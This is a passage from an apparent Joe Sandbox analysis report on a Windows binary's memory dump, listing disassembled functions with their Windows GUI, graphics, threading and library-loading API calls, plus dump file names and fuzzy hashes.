                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F623D7
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d6c8385ded582630cf9436891e5ad516cbd4d932f8d600b648d5e7cd2c4155b5
                                                                                                                                                                                                                                                                                        • Instruction ID: 788f2f58a90ae8bef7981ff94f35f9f9130cc4309e1d82791fdd942686e5c116
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6c8385ded582630cf9436891e5ad516cbd4d932f8d600b648d5e7cd2c4155b5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D11093AD00219FFEB119BA5CD85F9DBB78FB08750F200092EA01B7290D7716E10EB94
                                                                                                                                                                                                                                                                                        Function 00F01AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00F01AF4
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00F431F9
                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00F43203
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00F4320E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 11a40770b72d8a436484d8e7402539140cd2236638f6fa5f223b6f90788103d6
                                                                                                                                                                                                                                                                                        • Instruction ID: ee54e57d4635f0fcdf855c530ccf0aca9b416f66772c7776d3bd735d1c6f1607
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11a40770b72d8a436484d8e7402539140cd2236638f6fa5f223b6f90788103d6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E113A32A01119ABDB00EFA4C9469EE7BB9FB45350F200452F902E3181D779BA91FBA1
                                                                                                                                                                                                                                                                                        Function 00F6EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F6EB14
                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00F6EB47
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F6EB5D
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F6EB64
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3a125741fbd5293ae29e6f3e91d6c93f42637c54d794756e25e8f871fba3f2d6
                                                                                                                                                                                                                                                                                        • Instruction ID: 09e009c7061e020e469498cc6e77945f02d0e646457ba308b58bae65aac70031
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a125741fbd5293ae29e6f3e91d6c93f42637c54d794756e25e8f871fba3f2d6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5011D677D0021CBBDB019BB89C06A9F7FADAB45320F144257F825E3290D675C904A7A1
                                                                                                                                                                                                                                                                                        Function 00F2D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,?,00F2D369,00000000,00000004,00000000), ref: 00F2D588
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F2D594
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00F2D59B
                                                                                                                                                                                                                                                                                        • ResumeThread.KERNEL32(00000000), ref: 00F2D5B9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 08ed87c0c2c5bfdad39bd4c2cd7533fdc76f30d850047715eb7b8c2459447d50
                                                                                                                                                                                                                                                                                        • Instruction ID: 01dabc365e96bf2e24b6e900b3251604b382ad403d89d3f1b34f4e512711316e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08ed87c0c2c5bfdad39bd4c2cd7533fdc76f30d850047715eb7b8c2459447d50
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2301F9328111387BDB146FA5FC06FAE7B68EF81335F240215F925861E0CBB08804F6A1
                                                                                                                                                                                                                                                                                        Function 00F07873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F078B1
                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00F078C5
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F078CF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 80b52689e64ba2a5b1c4273e3923943798475904856829afba6638847ca4fa27
                                                                                                                                                                                                                                                                                        • Instruction ID: 29faad0ea7dee40ffc9409c9887d6c19843627aff4f417f9a01089b6130a48fa
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80b52689e64ba2a5b1c4273e3923943798475904856829afba6638847ca4fa27
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F118E7290524CBFDF026F908C58EEABBAAFF08364F244116FA0052150D731AC60FBA1
                                                                                                                                                                                                                                                                                        Function 00F333E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00F3338D,00000364,00000000,00000000,00000000,?,00F335FE,00000006,FlsSetValue), ref: 00F33418
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00F3338D,00000364,00000000,00000000,00000000,?,00F335FE,00000006,FlsSetValue,00FA3260,FlsSetValue,00000000,00000364,?,00F331B9), ref: 00F33424
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F3338D,00000364,00000000,00000000,00000000,?,00F335FE,00000006,FlsSetValue,00FA3260,FlsSetValue,00000000), ref: 00F33432
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a2ce1b42ab5a35bb033972039c94630f5c8c22a05e06c85f943c639add59e3fa
                                                                                                                                                                                                                                                                                        • Instruction ID: 9e81ba932868ca98da7efff9a68152439dcc8e78cb97a348ac009692b13093af
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2ce1b42ab5a35bb033972039c94630f5c8c22a05e06c85f943c639add59e3fa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC01A733B11226ABDB22CB79DD44A567B58BF05B71B214621F906D7180D730DE01E6E0
                                                                                                                                                                                                                                                                                        Function 00F6BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F6B69A,?,00008000), ref: 00F6BA8B
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F6B69A,?,00008000), ref: 00F6BAB0
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F6B69A,?,00008000), ref: 00F6BABA
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F6B69A,?,00008000), ref: 00F6BAED
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c4d8c2c521208df3f23b5ac6f9e08928c72aa3e006fd984612589b2bf01bacd7
                                                                                                                                                                                                                                                                                        • Instruction ID: 307a5201899b66e149d63bdd741c73050886a8f2698c97bcc06b5cd28f422b16
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4d8c2c521208df3f23b5ac6f9e08928c72aa3e006fd984612589b2bf01bacd7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E115B32C0162DEBDF00EFE5E9497EEBB78BF09711F104096D941B2180CB789691EBA5
                                                                                                                                                                                                                                                                                        Function 00F9886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F9888E
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00F988A6
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00F988CA
                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F988E5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 98343e534986e7026bdcd081a053b4aad95701ccff7097da86fb4bc3bd69fcd2
                                                                                                                                                                                                                                                                                        • Instruction ID: fe57c55a7c8226ccfeee4ff0e3853a3e425d0fbddb51061416e38c2b930a36b2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98343e534986e7026bdcd081a053b4aad95701ccff7097da86fb4bc3bd69fcd2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F1110B9D0020DAFDB41DFA8C884AEEBBB9FB09314F508166E915E2210D735AA55DF50
                                                                                                                                                                                                                                                                                        Function 00F636F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F63712
                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F63723
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F6372A
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F63731
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b5f36498b1ad8f8c6521f8c9b21295f07a39f1fcf7f7a0957cff028468f178d0
                                                                                                                                                                                                                                                                                        • Instruction ID: a267bc7cffe8dd0e10711f673af0a9925319bee96a5749f13233a5413db8fb9d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5f36498b1ad8f8c6521f8c9b21295f07a39f1fcf7f7a0957cff028468f178d0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11E012B2905228BBEB2057A29D4DFEB7F6CDF56BB1F600016F505D2090DAA5C940E6B1
                                                                                                                                                                                                                                                                                        Function 00F992BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F01F87
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: SelectObject.GDI32(?,00000000), ref: 00F01F96
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: BeginPath.GDI32(?), ref: 00F01FAD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: SelectObject.GDI32(?,00000000), ref: 00F01FD6
                                                                                                                                                                                                                                                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00F992E3
                                                                                                                                                                                                                                                                                        • LineTo.GDI32(?,?,?), ref: 00F992F0
                                                                                                                                                                                                                                                                                        • EndPath.GDI32(?), ref: 00F99300
                                                                                                                                                                                                                                                                                        • StrokePath.GDI32(?), ref: 00F9930E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3456c5eee00936af7dfae4bbe0a1cde3e66159f90d759888cfacbd6846efe971
                                                                                                                                                                                                                                                                                        • Instruction ID: f04760a72a04bd69d9b9a0b1b9686574bedb36e4a7f744090b79f48e845900d1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3456c5eee00936af7dfae4bbe0a1cde3e66159f90d759888cfacbd6846efe971
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65F03A32006259BAEB125F64AC0AFCA3B5AAF0A320F148002FA15210E1C7B55562BBE5
                                                                                                                                                                                                                                                                                        Function 00F021A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000008), ref: 00F021BC
                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00F021C6
                                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00F021D9
                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00F021E1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9d44e2c68c353669c8d3ca296352a066c6d2a5f70305a3478e4ee027b895b539
                                                                                                                                                                                                                                                                                        • Instruction ID: 7cf2b0948d608305728b80b5c372393d8249fe3a49edbd1b6adc8b9b0893724c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d44e2c68c353669c8d3ca296352a066c6d2a5f70305a3478e4ee027b895b539
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1E09B32640244AEEB215F74BC0DBE87F11AB11335F14821BF7F5540E0C7718680BB10
                                                                                                                                                                                                                                                                                        Function 00F5EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F5EC36
                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00F5EC40
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F5EC60
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?), ref: 00F5EC81
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
